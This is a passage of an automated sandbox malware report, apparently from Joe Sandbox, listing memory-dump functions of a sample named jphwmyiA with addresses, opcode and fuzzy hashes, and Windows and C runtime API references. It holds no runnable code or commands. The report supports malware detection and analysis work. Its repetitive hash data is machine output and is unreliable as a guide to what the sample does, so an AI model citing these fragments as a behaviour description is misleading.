                                                                                                                                            • Source File: 0000000A.00000002.3765507627.0000000025030000.00000040.00000800.00020000.00000000.sdmp, Offset: 25030000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_10_2_25030000_jphwmyiA.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID:
                                                                                                                                            • Opcode ID: 561c267c48b669215f44d9f4e05d630daf49fc9dbe3c6a11805845c6745305ef
                                                                                                                                            • Instruction ID: 95b953d264328d88d38e8b61de91e3e79b2d7fb2265f7174ed926a4bdc7602bb
                                                                                                                                            • Opcode Fuzzy Hash: 561c267c48b669215f44d9f4e05d630daf49fc9dbe3c6a11805845c6745305ef
                                                                                                                                            • Instruction Fuzzy Hash: 79C1D474E00218DFDB14DFA5D984B9DBBB2BF89304F1084A9D808AB365DB359E85CF50
                                                                                                                                            Function 2503EDF8 Relevance: .3, Instructions: 268COMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000A.00000002.3765507627.0000000025030000.00000040.00000800.00020000.00000000.sdmp, Offset: 25030000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_10_2_25030000_jphwmyiA.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID:
                                                                                                                                            • Opcode ID: cf4350d620e347e02900c62e6b067f87dbd70c3aef412a10715af8a9ae56829a
                                                                                                                                            • Instruction ID: bb011b1dfe071e794b76cb9ccfe254401edc32dda61ddde3e87f2beead28eb44
                                                                                                                                            • Opcode Fuzzy Hash: cf4350d620e347e02900c62e6b067f87dbd70c3aef412a10715af8a9ae56829a
                                                                                                                                            • Instruction Fuzzy Hash: CDC1D474E00218DFDB14DFA5D985B9DBBB2BF89300F2080A9D809AB365DB395E85CF50
                                                                                                                                            Function 2503D840 Relevance: .3, Instructions: 268COMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000A.00000002.3765507627.0000000025030000.00000040.00000800.00020000.00000000.sdmp, Offset: 25030000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_10_2_25030000_jphwmyiA.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID:
                                                                                                                                            • Opcode ID: c6c1324eaa5764ecc5352e8069a8d4d3b6dcee831748e9325faf68f95b71626f
                                                                                                                                            • Instruction ID: fbdfa264d1ffa2a33d196c139f50badb6d76f3c023877f317be1448a461a03e5
                                                                                                                                            • Opcode Fuzzy Hash: c6c1324eaa5764ecc5352e8069a8d4d3b6dcee831748e9325faf68f95b71626f
                                                                                                                                            • Instruction Fuzzy Hash: 2CC1D474E00218DFDB14DFA5D995B9DBBB2BF89300F2080A9D809AB365DB359E85CF50
                                                                                                                                            Function 2503DC98 Relevance: .3, Instructions: 268COMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000A.00000002.3765507627.0000000025030000.00000040.00000800.00020000.00000000.sdmp, Offset: 25030000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_10_2_25030000_jphwmyiA.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID:
                                                                                                                                            • Opcode ID: 8827bf5f0f90464745572e4fd2e9a5a3a736f7848923910ff3154665496f5fcd
                                                                                                                                            • Instruction ID: 34b9362f6f6bbcd7a19953081df0740c1aac9af1d5b305b81095ae15aacf9d9e
                                                                                                                                            • Opcode Fuzzy Hash: 8827bf5f0f90464745572e4fd2e9a5a3a736f7848923910ff3154665496f5fcd
                                                                                                                                            • Instruction Fuzzy Hash: 8EC1D474E00218DFDB14DFA5D985B9DBBB2BF89300F2081A9D809AB365DB355E85CF50
                                                                                                                                            Function 2503E0F0 Relevance: .3, Instructions: 268COMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000A.00000002.3765507627.0000000025030000.00000040.00000800.00020000.00000000.sdmp, Offset: 25030000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_10_2_25030000_jphwmyiA.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID:
                                                                                                                                            • Opcode ID: 4687f469caedd507a100f4958acda43ba3340e36a305f2fa8efbc89d01a157a7
                                                                                                                                            • Instruction ID: e8b46030b9070eb9435706d5d4f85a016bb7d79e12e74649d5e00bfc7d6b24fe
                                                                                                                                            • Opcode Fuzzy Hash: 4687f469caedd507a100f4958acda43ba3340e36a305f2fa8efbc89d01a157a7
                                                                                                                                            • Instruction Fuzzy Hash: 52C1D474E00218DFDB14DFA5D985B9DBBB2BF89300F2081A9D809AB365DB355E85CF50
                                                                                                                                            Function 2503FB00 Relevance: .3, Instructions: 268COMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000A.00000002.3765507627.0000000025030000.00000040.00000800.00020000.00000000.sdmp, Offset: 25030000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_10_2_25030000_jphwmyiA.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID:
                                                                                                                                            • Opcode ID: 43a433be25c5c5bc0df2a7b0ecaef1c67c62469c9fa2b4d32d8afe6f2bf2db0c
                                                                                                                                            • Instruction ID: 13d23109014cc9bb6897c828ed2501445cab10076446cf9b2f1f7c78123297b9
                                                                                                                                            • Opcode Fuzzy Hash: 43a433be25c5c5bc0df2a7b0ecaef1c67c62469c9fa2b4d32d8afe6f2bf2db0c
                                                                                                                                            • Instruction Fuzzy Hash: AEC1D374E00218DFDB14DFA5D945B9DBBB2BF89300F2080A9D809AB365DB399E85CF50
                                                                                                                                            Function 2503CF90 Relevance: .3, Instructions: 268COMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000A.00000002.3765507627.0000000025030000.00000040.00000800.00020000.00000000.sdmp, Offset: 25030000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_10_2_25030000_jphwmyiA.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID:
                                                                                                                                            • Opcode ID: c7623daa8a6b829c6e3ea7737cc5ef1ad9e837309b542ef249951bd76c716577
                                                                                                                                            • Instruction ID: adfb9b007666c83f81e0827728c4a800560106728cd460c431a095e7516c2d11
                                                                                                                                            • Opcode Fuzzy Hash: c7623daa8a6b829c6e3ea7737cc5ef1ad9e837309b542ef249951bd76c716577
                                                                                                                                            • Instruction Fuzzy Hash: 4DC1C474E00218DFDB14DFA5D995B9DBBB2BF89300F2080A9D809AB365DB359E85CF50
                                                                                                                                            Function 2503D3E8 Relevance: .3, Instructions: 268COMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000A.00000002.3765507627.0000000025030000.00000040.00000800.00020000.00000000.sdmp, Offset: 25030000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_10_2_25030000_jphwmyiA.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID:
                                                                                                                                            • Opcode ID: c36143dcd2f0ecf57849da318fc8a673e3fa384be85bb98e4e34a924a1330123
                                                                                                                                            • Instruction ID: 4403bfbb4cc73c6c4581409aed2a1a9c1f64befac79e4dfc89dc81f6fa711518
                                                                                                                                            • Opcode Fuzzy Hash: c36143dcd2f0ecf57849da318fc8a673e3fa384be85bb98e4e34a924a1330123
                                                                                                                                            • Instruction Fuzzy Hash: ACC1C374E00218DFDB14DFA5D995B9DBBB2BF89300F2080A9D809AB365DB356E85CF50
                                                                                                                                            Function 2503BE30 Relevance: .3, Instructions: 268COMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000A.00000002.3765507627.0000000025030000.00000040.00000800.00020000.00000000.sdmp, Offset: 25030000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_10_2_25030000_jphwmyiA.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID:
                                                                                                                                            • Opcode ID: da6ce29a3a3b5d9722d56a3d823009177266e25e29bca25019175d49e3054e91
                                                                                                                                            • Instruction ID: 5b60a09c2f3ff57aad6d35664d4e8f3af9942870bf1ff1b3b42912d5828bb081
                                                                                                                                            • Opcode Fuzzy Hash: da6ce29a3a3b5d9722d56a3d823009177266e25e29bca25019175d49e3054e91
                                                                                                                                            • Instruction Fuzzy Hash: 5BC1D574E00218DFDB14DFA5D945B9DBBB2BF89304F1080A9D809AB365DB35AE85CF50
                                                                                                                                            Function 2503F250 Relevance: .3, Instructions: 268COMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000A.00000002.3765507627.0000000025030000.00000040.00000800.00020000.00000000.sdmp, Offset: 25030000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_10_2_25030000_jphwmyiA.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID:
                                                                                                                                            • Opcode ID: 263516b40a7b7d1efbe42b5df19f6f8d7fe9729c977e197f98b4f3b4af82701d
                                                                                                                                            • Instruction ID: 3b3818a16fc3a603969f207c1178cb45a23c85f156bf537917fd23a7bed1d543
                                                                                                                                            • Opcode Fuzzy Hash: 263516b40a7b7d1efbe42b5df19f6f8d7fe9729c977e197f98b4f3b4af82701d
                                                                                                                                            • Instruction Fuzzy Hash: 39C1C474E00218DFDB14DFA5D995B9DBBB2BF89300F2080A9D809AB365DB395E85CF50
                                                                                                                                            Function 2503C288 Relevance: .3, Instructions: 268COMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000A.00000002.3765507627.0000000025030000.00000040.00000800.00020000.00000000.sdmp, Offset: 25030000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_10_2_25030000_jphwmyiA.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID:
                                                                                                                                            • Opcode ID: 985b3cd8be75397eb0fe6924b08a01345b11acefd15ba0d06a6cff605b7f9efe
                                                                                                                                            • Instruction ID: 5e2f19ef759f2848fbfc4f18ae75459b94d005bb68b060401dc9de5f368a8023
                                                                                                                                            • Opcode Fuzzy Hash: 985b3cd8be75397eb0fe6924b08a01345b11acefd15ba0d06a6cff605b7f9efe
                                                                                                                                            • Instruction Fuzzy Hash: 89C1D474E00218DFDB14DFA5D994B9DBBB2BF89300F2084A9D809AB365DB355E85CF50
                                                                                                                                            Function 2503F6A8 Relevance: .3, Instructions: 268COMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000A.00000002.3765507627.0000000025030000.00000040.00000800.00020000.00000000.sdmp, Offset: 25030000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_10_2_25030000_jphwmyiA.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID:
                                                                                                                                            • Opcode ID: 95fe03ce9715988cd86eb6874c3a8cee8e83eaabfcaf49b20a6a706f654e09ee
                                                                                                                                            • Instruction ID: 99dbaedc99a92959e292781852530413a4b632a16ea77068b7f45690e04da323
                                                                                                                                            • Opcode Fuzzy Hash: 95fe03ce9715988cd86eb6874c3a8cee8e83eaabfcaf49b20a6a706f654e09ee
                                                                                                                                            • Instruction Fuzzy Hash: 6AC1B474E00218DFDB14DFA5D955B9DBBB2BF89300F2080A9D809AB365DB399E85CF50
                                                                                                                                            Function 2503C6E0 Relevance: .3, Instructions: 268COMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000A.00000002.3765507627.0000000025030000.00000040.00000800.00020000.00000000.sdmp, Offset: 25030000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_10_2_25030000_jphwmyiA.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID:
                                                                                                                                            • Opcode ID: 6cbe2f4110cc2498fdec3eaf292a3371db90e15b1d3487cb6fb52bac74b764d7
                                                                                                                                            • Instruction ID: fbc673c5fc878ec04af7286a70408b5f976582ac7c6b18d46eb5a355a9b55740
                                                                                                                                            • Opcode Fuzzy Hash: 6cbe2f4110cc2498fdec3eaf292a3371db90e15b1d3487cb6fb52bac74b764d7
                                                                                                                                            • Instruction Fuzzy Hash: 03C1D474E00218DFDB14DFA5D994B9DBBB2BF89300F2084A9D809AB365DB356E85CF50
                                                                                                                                            Function 250B04D0 Relevance: .3, Instructions: 268COMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000A.00000002.3765726415.00000000250B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 250B0000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_10_2_250b0000_jphwmyiA.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID:
                                                                                                                                            • Opcode ID: 39eb23d1986a5334849114e88dbbeb14ea28933e4464b331c612c0938e39512d
                                                                                                                                            • Instruction ID: ab90a95d474fdb84732225f3dfd1a1745da8a73577fd108e5667bf93b209b5cd
                                                                                                                                            • Opcode Fuzzy Hash: 39eb23d1986a5334849114e88dbbeb14ea28933e4464b331c612c0938e39512d
                                                                                                                                            • Instruction Fuzzy Hash: 33C1A474E00218CFDB14DFA5D994B9DBBB2BF89300F2085A9D809AB365DB356E85CF50
                                                                                                                                            Function 25045D10 Relevance: .3, Instructions: 268COMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000A.00000002.3765563475.0000000025040000.00000040.00000800.00020000.00000000.sdmp, Offset: 25040000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_10_2_25040000_jphwmyiA.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID:
                                                                                                                                            • Opcode ID: a519d486dd87a37fbaaf7cc5be298ed3cda0fc0dc47c45ad219ced2bf1f6f8b0
                                                                                                                                            • Instruction ID: 43543976297dbaa54f60736a37969e460ca075e23a526848ffa0ff98bab6d960
                                                                                                                                            • Opcode Fuzzy Hash: a519d486dd87a37fbaaf7cc5be298ed3cda0fc0dc47c45ad219ced2bf1f6f8b0
                                                                                                                                            • Instruction Fuzzy Hash: 17C1C474E00218CFDB14DFA5D954B9DBBB2BF89300F2080A9D809AB365DB359E85CF50
                                                                                                                                            Function 25043918 Relevance: .3, Instructions: 268COMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000A.00000002.3765563475.0000000025040000.00000040.00000800.00020000.00000000.sdmp, Offset: 25040000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_10_2_25040000_jphwmyiA.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID:
                                                                                                                                            • Opcode ID: 23960aedebcfea0cd27389fdecfb11c585e5cdf36af707297657e363109c5572
                                                                                                                                            • Instruction ID: 9e7c8ea0458fc680a431173ebcb1e72e1568a7a0f71539806b0295aad481cc9f
                                                                                                                                            • Opcode Fuzzy Hash: 23960aedebcfea0cd27389fdecfb11c585e5cdf36af707297657e363109c5572
                                                                                                                                            • Instruction Fuzzy Hash: 77C1B474E00218CFDB14DFA5D994B9DBBB2BF89304F2084A9D809AB365DB355E85CF50
                                                                                                                                            Function 00417081 Relevance: 31.8, APIs: 21, Instructions: 340COMMONLIBRARYCODE
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            • LCMapStringW.KERNEL32(00000000,00000100,00420398,00000001,00000000,00000000,7FFFFFFF,00000100,7FFFFFFF,?,?,?,?,7FFFFFFF,?,00000000), ref: 004170B3
                                                                                                                                            • GetLastError.KERNEL32(?,00000000,7FFFFFFF,00000000,?,?,00000000,00000000,7FFFFFFF,00000000,?,7FFFFFFF,00000000,00000000,?,20E718E0), ref: 004170C5
                                                                                                                                            • MultiByteToWideChar.KERNEL32(7FFFFFFF,00000000,?,?,00000000,00000000,7FFFFFFF,00000100,7FFFFFFF,?,?,?,?,7FFFFFFF,?,00000000), ref: 00417151
                                                                                                                                            • _malloc.LIBCMT ref: 0041718A
                                                                                                                                            • MultiByteToWideChar.KERNEL32(?,00000001,?,?,?,00000000,?,00000000,7FFFFFFF,00000000,?,?,00000000,00000000,7FFFFFFF,00000000), ref: 004171BD
                                                                                                                                            • LCMapStringW.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,?,00000000,7FFFFFFF,00000000,?,?,00000000,00000000,7FFFFFFF,00000000), ref: 004171D9
                                                                                                                                            • LCMapStringW.KERNEL32(?,00000400,00000400,00000000,?,?), ref: 00417213
                                                                                                                                            • _malloc.LIBCMT ref: 0041724C
                                                                                                                                            • LCMapStringW.KERNEL32(?,00000400,00000400,00000000,00000000,?), ref: 00417277
                                                                                                                                            • WideCharToMultiByte.KERNEL32(?,00000000,00000000,?,?,?,00000000,00000000), ref: 0041729A
                                                                                                                                            • __freea.LIBCMT ref: 004172A4
                                                                                                                                            • __freea.LIBCMT ref: 004172AD
                                                                                                                                            • ___ansicp.LIBCMT ref: 004172DE
                                                                                                                                            • ___convertcp.LIBCMT ref: 00417309
                                                                                                                                            • LCMapStringA.KERNEL32(?,?,00000000,?,00000000,00000000,?,?,?,7FFFFFFF,00000100,7FFFFFFF,?,?,?,?), ref: 0041732A
                                                                                                                                            • _malloc.LIBCMT ref: 00417362
                                                                                                                                            • _memset.LIBCMT ref: 00417384
                                                                                                                                            • LCMapStringA.KERNEL32(?,?,?,?,00000000,?,?,?,?,?,?,?,7FFFFFFF,00000100,7FFFFFFF,?), ref: 0041739C
                                                                                                                                            • ___convertcp.LIBCMT ref: 004173BA
                                                                                                                                            • __freea.LIBCMT ref: 004173CF
                                                                                                                                            • LCMapStringA.KERNEL32(?,?,?,?,7FFFFFFF,00000100,7FFFFFFF,00000100,7FFFFFFF,?,?,?,?,7FFFFFFF,?,00000000), ref: 004173E9
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000A.00000002.3731530309.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            • Associated: 0000000A.00000002.3731530309.0000000000426000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.3731530309.000000000043F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_10_2_400000_jphwmyiA.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID: String$ByteCharMultiWide__freea_malloc$___convertcp$ErrorLast___ansicp_memset
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 3809854901-0
                                                                                                                                            • Opcode ID: 3d09e5343aa18fab3ca4e2e74db44cf1cccdb49efdd84c094ede33f31d65ba6e
                                                                                                                                            • Instruction ID: cdfffc9a1d2b3026f9ae82d5cc8d175594050d3ba9b5f3d3ede674b9b5b9b85c
                                                                                                                                            • Opcode Fuzzy Hash: 3d09e5343aa18fab3ca4e2e74db44cf1cccdb49efdd84c094ede33f31d65ba6e
                                                                                                                                            • Instruction Fuzzy Hash: 29B1B072908119EFCF119FA0CC808EF7BB5EF48354B14856BF915A2260D7398DD2DB98
                                                                                                                                            Function 004057B0 Relevance: 12.5, APIs: 6, Strings: 1, Instructions: 205COMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            • _malloc.LIBCMT ref: 004057DE
                                                                                                                                              • Part of subcall function 0040B84D: __FF_MSGBANNER.LIBCMT ref: 0040B870
                                                                                                                                              • Part of subcall function 0040B84D: __NMSG_WRITE.LIBCMT ref: 0040B877
                                                                                                                                              • Part of subcall function 0040B84D: RtlAllocateHeap.NTDLL(00000000,-0000000E,00000001,00000000,00000000,?,00411C86,00000001,00000001,00000001,?,0040D66A,00000018,00421240,0000000C,0040D6FB), ref: 0040B8C4
                                                                                                                                            • _malloc.LIBCMT ref: 00405842
                                                                                                                                            • _malloc.LIBCMT ref: 00405906
                                                                                                                                            • _malloc.LIBCMT ref: 00405930
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000A.00000002.3731530309.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            • Associated: 0000000A.00000002.3731530309.0000000000426000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.3731530309.000000000043F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_10_2_400000_jphwmyiA.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID: _malloc$AllocateHeap
                                                                                                                                            • String ID: 1.2.3
                                                                                                                                            • API String ID: 680241177-2310465506
                                                                                                                                            • Opcode ID: 1371ffb49ce3b8dee1113081a69af0fad64233f45308895947edc3c59a7df708
                                                                                                                                            • Instruction ID: 6f54ea0e5a0cddcbb7a6eab5c61130b8c10e9e343dc86a4c4a61a5a67c51a18e
                                                                                                                                            • Opcode Fuzzy Hash: 1371ffb49ce3b8dee1113081a69af0fad64233f45308895947edc3c59a7df708
                                                                                                                                            • Instruction Fuzzy Hash: 8B61F7B1944B408FD720AF2A888066BBBE0FB45314F548D3FE5D5A3781D739D8498F5A
                                                                                                                                            Function 0040BCC2 Relevance: 10.7, APIs: 7, Instructions: 189COMMONLIBRARYCODE
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000A.00000002.3731530309.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            • Associated: 0000000A.00000002.3731530309.0000000000426000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.3731530309.000000000043F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_10_2_400000_jphwmyiA.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID: _memset$__filbuf__fileno__getptd_noexit__read_memcpy_s
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 3886058894-0
                                                                                                                                            • Opcode ID: c8cdba87b669e5a45588b0eb276f39e335abb1b1e80ab099951c299220f7b7ba
                                                                                                                                            • Instruction ID: 0234425abcb0213f77efd30778ac7634d7a408156a07f93f58cd91f86a00e979
                                                                                                                                            • Opcode Fuzzy Hash: c8cdba87b669e5a45588b0eb276f39e335abb1b1e80ab099951c299220f7b7ba
                                                                                                                                            • Instruction Fuzzy Hash: 1E519031A00605ABCB209F69C844A9FBB75EF41324F24863BF825B22D1D7799E51CBDD
                                                                                                                                            Function 004017E0 Relevance: 10.6, APIs: 7, Instructions: 50COMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            • EntryPoint.JPHWMYIA(80070057), ref: 004017EE
                                                                                                                                              • Part of subcall function 00401030: RaiseException.KERNEL32(-0000000113D97C15,00000001,00000000,00000000,00000015,2C2D8410), ref: 0040101C
                                                                                                                                              • Part of subcall function 00401030: GetLastError.KERNEL32 ref: 00401030
                                                                                                                                            • EntryPoint.JPHWMYIA(80070057), ref: 00401800
                                                                                                                                            • EntryPoint.JPHWMYIA(80070057), ref: 00401813
                                                                                                                                            • __recalloc.LIBCMT ref: 00401828
                                                                                                                                            • EntryPoint.JPHWMYIA(8007000E), ref: 00401839
                                                                                                                                            • EntryPoint.JPHWMYIA(8007000E), ref: 00401853
                                                                                                                                            • _calloc.LIBCMT ref: 00401861
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000A.00000002.3731530309.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            • Associated: 0000000A.00000002.3731530309.0000000000426000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.3731530309.000000000043F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_10_2_400000_jphwmyiA.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID: EntryPoint$ErrorExceptionLastRaise__recalloc_calloc
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 1721462702-0
                                                                                                                                            • Opcode ID: a5ad3cd8a15542cfcc4b59831b28fc936e8548016bd987b06b7189672beebcc8
                                                                                                                                            • Instruction ID: 9b44c07ae4757e317c030d83b628f3e382e80143504443e1f3b2735d650bea0f
                                                                                                                                            • Opcode Fuzzy Hash: a5ad3cd8a15542cfcc4b59831b28fc936e8548016bd987b06b7189672beebcc8
                                                                                                                                            • Instruction Fuzzy Hash: AC018872500241EACA21BA229C06F1B7294DF90799F24893FF4C5762E2D63D9990D6EE
                                                                                                                                            Function 00414738 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 31COMMONLIBRARYCODE
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            • __getptd.LIBCMT ref: 00414744
                                                                                                                                              • Part of subcall function 00410735: __getptd_noexit.LIBCMT ref: 00410738
                                                                                                                                              • Part of subcall function 00410735: __amsg_exit.LIBCMT ref: 00410745
                                                                                                                                            • __getptd.LIBCMT ref: 0041475B
                                                                                                                                            • __amsg_exit.LIBCMT ref: 00414769
                                                                                                                                            • __lock.LIBCMT ref: 00414779
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000A.00000002.3731530309.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            • Associated: 0000000A.00000002.3731530309.0000000000426000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.3731530309.000000000043F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_10_2_400000_jphwmyiA.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID: __amsg_exit__getptd$__getptd_noexit__lock
                                                                                                                                            • String ID: @.B
                                                                                                                                            • API String ID: 3521780317-470711618
                                                                                                                                            • Opcode ID: f43c5434038c0e2b3130a40ea1e7b9b854db78837d0c16722a3a572f716d4dbb
                                                                                                                                            • Instruction ID: 91aff3cf2d6bbea4e2ea5d49e8e08bf0f41c3eb50374f8394f27d7b6c467aa53
                                                                                                                                            • Opcode Fuzzy Hash: f43c5434038c0e2b3130a40ea1e7b9b854db78837d0c16722a3a572f716d4dbb
                                                                                                                                            • Instruction Fuzzy Hash: 60F09631A407009BE720BB66850678D73A06F81719F91456FE4646B2D1CB7C6981CA5D
                                                                                                                                            Function 0040C73D Relevance: 7.6, APIs: 5, Instructions: 64COMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            • __lock_file.LIBCMT ref: 0040C6C8
                                                                                                                                            • __fileno.LIBCMT ref: 0040C6D6
                                                                                                                                            • __fileno.LIBCMT ref: 0040C6E2
                                                                                                                                            • __fileno.LIBCMT ref: 0040C6EE
                                                                                                                                            • __fileno.LIBCMT ref: 0040C6FE
                                                                                                                                              • Part of subcall function 0040BFC1: __getptd_noexit.LIBCMT ref: 0040BFC1
                                                                                                                                              • Part of subcall function 0040E744: __decode_pointer.LIBCMT ref: 0040E74F
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000A.00000002.3731530309.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            • Associated: 0000000A.00000002.3731530309.0000000000426000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.3731530309.000000000043F000.00000040.00000400.00020000.00000000.sdmpDownload File
